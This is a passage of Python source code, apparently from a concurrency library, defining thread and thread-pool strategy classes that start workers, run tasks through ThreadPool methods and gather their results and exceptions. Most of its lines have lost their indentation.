self._Thread_Running_Result[:] = []
class ThreadStrategy(ConcurrentStrategy, _GeneralRunnableStrategy):
_Strategy_Feature_Mode: _FeatureMode = _FeatureMode.Concurrent
__Thread_List: List[Thread] = None
def initialization(self, queue_tasks: Optional[Union[_BaseQueueTask, _BaseList]] = None,
features: Optional[Union[_BaseFeatureAdapterFactory, _BaseList]] = None,
*args, **kwargs) -> None:
super(ThreadStrategy, self).initialization(queue_tasks=queue_tasks, features=features, *args, **kwargs)
@dispatch((FunctionType, MethodType, PartialFunction), args=tuple, kwargs=dict)
def _start_new_worker(self, target: Callable, args: Tuple = (), kwargs: Dict = {}) -> Thread:
__worker = self.generate_worker(target, *args, **kwargs)
self.activate_workers(__worker)
return __worker
@dispatch(Iterable, args=tuple, kwargs=dict)
def _start_new_worker(self, target: List[Callable], args: Tuple = (), kwargs: Dict = {}) -> List[Thread]:
__workers = [self.generate_worker(__function, *args, **kwargs) for __function in target]
self.activate_workers(__workers)
return __workers
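    # Wrap the target with ConcurrentStrategy.save_return_value so that its return value
    # or exception is captured when the Thread finishes running it.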
def generate_worker(self, target: Callable, *args, **kwargs) -> _MRTasks:
@wraps(target)
@ConcurrentStrategy.save_return_value
def _target_function(*_args, **_kwargs):
result_value = target(*_args, **_kwargs)
return result_value
return Thread(target=_target_function, args=args, kwargs=kwargs)
@dispatch(Thread)
def activate_workers(self, workers: Thread) -> None:
workers.start()
@dispatch(Iterable)
def activate_workers(self, workers: List[Thread]) -> None:
for worker in workers:
self.activate_workers(worker)
@dispatch(Thread)
def close(self, workers: Thread) -> None:
workers.join()
@dispatch(Iterable)
def close(self, workers: List[Thread]) -> None:
for worker in workers:
self.close(worker)
def get_result(self) -> List[_MRResult]:
return self.result()
def _saving_process(self) -> List[_ConcurrentResult]:
__concurrent_results = []
for __result in self._Thread_Running_Result:
_cresult = _ConcurrentResult()
            # # # # Save some basic info of the worker thread
_cresult.pid = __result["pid"]
_cresult.worker_name = __result["name"]
_cresult.worker_ident = __result["ident"]
if PYTHON_MAJOR_VERSION == 3 and PYTHON_MINOR_VERSION >= 8:
_cresult.native_id = __result["native_id"]
            # # # # Save the running state of the thread
__concurrent_successful = __result.get("successful", None)
if __concurrent_successful is True:
_cresult.state = _ResultState.SUCCESS.value
else:
_cresult.state = _ResultState.FAIL.value
            # # # # Save the running result of the thread
_cresult.data = __result.get("result", None)
_cresult.exception = __result.get("exception", None)
__concurrent_results.append(_cresult)
return __concurrent_results
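# Illustrative usage sketch for ThreadStrategy (comments only, not part of the original
# module; the constructor arguments shown here are an assumption inherited from the
# surrounding framework):
#
#     strategy = ThreadStrategy(executors=2)      # hypothetical constructor signature
#     workers = [strategy.generate_worker(task, i) for i in range(2)]
#     strategy.activate_workers(workers)
#     strategy.close(workers)
#     results = strategy.get_result()             # list of ConcurrentResult objects
#
# Each result exposes the worker's pid, name and ident, its success state, and either
# the task's return value or the exception it raised.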
class ThreadPoolStrategy(ConcurrentStrategy, _PoolRunnableStrategy, _Resultable):
_Thread_Pool: ThreadPool = None
_Thread_List: List[Union[ApplyResult, AsyncResult]] = None
def __init__(self, pool_size: int):
super().__init__(pool_size=pool_size)
def initialization(self, queue_tasks: Optional[Union[_BaseQueueTask, _BaseList]] = None,
features: Optional[Union[_BaseFeatureAdapterFactory, _BaseList]] = None,
*args, **kwargs) -> None:
super(ThreadPoolStrategy, self).initialization(queue_tasks=queue_tasks, features=features, *args, **kwargs)
        # Initialize and build the thread pool.
__pool_initializer: Callable = kwargs.get("pool_initializer", None)
__pool_initargs: IterableType = kwargs.get("pool_initargs", None)
self._Thread_Pool = ThreadPool(processes=self.pool_size, initializer=__pool_initializer, initargs=__pool_initargs)
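    # 'apply' submits tasks one at a time (ThreadPool.apply blocks per call), whereas the
    # 'async_apply' variants submit everything first and then collect results via .get().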
    def apply(self, tasks_size: int, function: Callable, args: Tuple = (), kwargs: Dict = {}) -> None:
        self.reset_result()
        # ThreadPool.apply is blocking and returns the task's result directly, so the
        # try/except wraps the call itself; a failing task is recorded as an
        # unsuccessful result instead of escaping as an uncaught exception.
        self._Thread_List = []
        for _ in range(tasks_size):
            try:
                __process_running_result = self._Thread_Pool.apply(func=function, args=args, kwds=kwargs)
                __exception = None
                __process_run_successful = True
            except Exception as e:
                __process_running_result = None
                __exception = e
                __process_run_successful = False
            self._Thread_List.append(__process_running_result)
            # Save Running result state and Running result value as dict
            self._result_saving(successful=__process_run_successful, result=__process_running_result, exception=__exception)
def async_apply(self, tasks_size: int, function: Callable, args: Tuple = (),
kwargs: Dict = {}, callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
self._Thread_List = [
self._Thread_Pool.apply_async(func=function,
args=args,
kwds=kwargs,
callback=callback,
error_callback=error_callback)
for _ in range(tasks_size)]
for process in self._Thread_List:
_process_running_result = None
_process_run_successful = None
_exception = None
try:
_process_running_result = process.get()
_process_run_successful = process.successful()
except Exception as e:
_exception = e
_process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=_process_run_successful, result=_process_running_result, exception=_exception)
    def apply_with_iter(self, functions_iter: List[Callable], args_iter: List[Tuple] = None, kwargs_iter: List[Dict] = None) -> None:
        self.reset_result()
        if args_iter is None:
            args_iter = [() for _ in functions_iter]
        if kwargs_iter is None:
            kwargs_iter = [{} for _ in functions_iter]
        # As in 'apply', the blocking call itself is wrapped so that a failing task is
        # recorded as an unsuccessful result rather than aborting the whole batch.
        self._Thread_List = []
        for _func, _args, _kwargs in zip(functions_iter, args_iter, kwargs_iter):
            try:
                __process_running_result = self._Thread_Pool.apply(func=_func, args=_args, kwds=_kwargs)
                __exception = None
                __process_run_successful = True
            except Exception as e:
                __process_running_result = None
                __exception = e
                __process_run_successful = False
            self._Thread_List.append(__process_running_result)
            # Save Running result state and Running result value as dict
            self._result_saving(successful=__process_run_successful, result=__process_running_result, exception=__exception)
def async_apply_with_iter(self, functions_iter: List[Callable], args_iter: List[Tuple] = None,
kwargs_iter: List[Dict] = None, callback_iter: List[Callable] = None,
error_callback_iter: List[Callable] = None) -> None:
self.reset_result()
if args_iter is None:
args_iter = [() for _ in functions_iter]
if kwargs_iter is None:
kwargs_iter = [{} for _ in functions_iter]
if callback_iter is None:
callback_iter = [None for _ in functions_iter]
if error_callback_iter is None:
error_callback_iter = [None for _ in functions_iter]
        self._Thread_List = [
            self._Thread_Pool.apply_async(
                func=_func,
                args=_args,
                kwds=_kwargs,
                callback=_callback,
                error_callback=_error_callback)
            for _func, _args, _kwargs, _callback, _error_callback in zip(
                functions_iter, args_iter, kwargs_iter, callback_iter, error_callback_iter)
        ]
for process in self._Thread_List:
_process_running_result = None
_process_run_successful = None
_exception = None
try:
_process_running_result = process.get()
_process_run_successful = process.successful()
except Exception as e:
_exception = e
_process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=_process_run_successful, result=_process_running_result, exception=_exception)
def map(self, function: Callable, args_iter: IterableType = (), chunksize: int = None) -> None:
self.reset_result()
__process_running_result = None
try:
__process_running_result = self._Thread_Pool.map(
func=function, iterable=args_iter, chunksize=chunksize)
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def async_map(self, function: Callable, args_iter: IterableType = (), chunksize: int = None,
callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
__map_result = self._Thread_Pool.map_async(
func=function,
iterable=args_iter,
chunksize=chunksize,
callback=callback,
error_callback=error_callback)
__process_running_result = __map_result.get()
__process_run_successful = __map_result.successful()
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def map_by_args(self, function: Callable, args_iter: IterableType[IterableType] = (), chunksize: int = None) -> None:
self.reset_result()
__process_running_result = None
try:
__process_running_result = self._Thread_Pool.starmap(
func=function, iterable=args_iter, chunksize=chunksize)
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def async_map_by_args(self, function: Callable, args_iter: IterableType[IterableType] = (),
chunksize: int = None, callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
__map_result = self._Thread_Pool.starmap_async(
func=function,
iterable=args_iter,
chunksize=chunksize,
callback=callback,
error_callback=error_callback)
__process_running_result = __map_result.get()
__process_run_successful = __map_result.successful()
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def imap(self, function: Callable, args_iter: IterableType = (), chunksize: int = 1) -> None:
self.reset_result()
__process_running_result = None
try:
imap_running_result = self._Thread_Pool.imap(func=function, iterable=args_iter, chunksize=chunksize)
__process_running_result = [result for result in imap_running_result]
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def imap_unordered(self, function: Callable, args_iter: IterableType = (), chunksize: int = 1) -> None:
self.reset_result()
__process_running_result = None
try:
imap_running_result = self._Thread_Pool.imap_unordered(func=function, iterable=args_iter, chunksize=chunksize)
__process_running_result = [result for result in imap_running_result]
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def _result_saving(self, successful: bool, result: List, exception: Exception) -> None:
_thread_result = {"successful": successful, "result": result, "exception": exception}
# Saving value into list
self._Thread_Running_Result.append(_thread_result)
def close(self) -> None:
self._Thread_Pool.close()
self._Thread_Pool.join()
def terminal(self) -> None:
self._Thread_Pool.terminate()
def get_result(self) -> List[_ConcurrentResult]:
return self.result()
def _saving_process(self) -> List[_ThreadPoolResult]:
_pool_results = []
for __result in self._Thread_Running_Result:
_pool_result = _ThreadPoolResult()
_pool_result.is_successful = __result["successful"]
_pool_result.data = __result["result"]
_pool_results.append(_pool_result)
return _pool_results